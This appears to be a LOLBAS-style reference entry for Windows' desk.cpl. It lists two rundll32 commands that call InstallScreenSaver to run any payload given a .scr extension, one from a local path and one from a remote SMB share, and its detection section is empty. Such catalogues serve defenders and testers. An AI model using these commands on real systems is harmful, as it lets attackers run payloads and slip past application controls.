Desk.cpl

Desktop Settings Control Panel

Paths

  • C:\Windows\System32\desk.cpl
  • C:\Windows\SysWOW64\desk.cpl

Commands

Execute

Launch an executable with a .scr extension by calling the InstallScreenSaver function.

Use case: Launch any executable payload, as long as it uses the .scr extension.

Privileges: User

rundll32.exe desk.cpl,InstallScreenSaver {PATH_ABSOLUTE:.scr}

Execute

Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.

Use case: Launch any executable payload, as long as it uses the .scr extension.

Privileges: User

rundll32.exe desk.cpl,InstallScreenSaver {PATH_SMB:.scr}

Detection

Resources